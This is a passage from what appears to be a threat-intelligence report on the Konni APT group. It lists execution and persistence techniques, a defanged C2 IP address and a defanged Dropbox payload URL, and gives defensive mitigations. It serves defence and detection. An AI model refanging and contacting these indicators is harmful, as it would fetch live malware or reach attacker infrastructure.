- **Execution:** `mshta.exe`, PowerShell.
- **Persistence:** Scheduled Tasks.
- **Infrastructure (C2/Downloads):**
- **IP:** 64\[.\]20\[.\]59\[.\]148
- **Domain/URL (Dropbox):** https://www\[.\]dropbox\[.\]com/scl/fi/ouck6s5mxghmwz57tzkzj/Sm\[.\]dat?rlkey=2a6qys5xgufg2ouk93or0vmcr&st=zzaqdclb&dl=1
## Implications
Konni APT utilizes multi-layered obfuscation and trusted services (Dropbox) for initial staging, posing a challenge to perimeter defenses relying solely on traditional file signature analysis. Persistence mechanisms are aggressive (5-minute checks).
## Mitigations
- Restrict execution of downloaded LNK files or scripts relying on trusted public services for payload delivery.
- Implement strict controls and logging over `mshta.exe` execution, especially when initiated by macro or script files.
- Monitor for the creation of high-frequency scheduled tasks designed for persistence.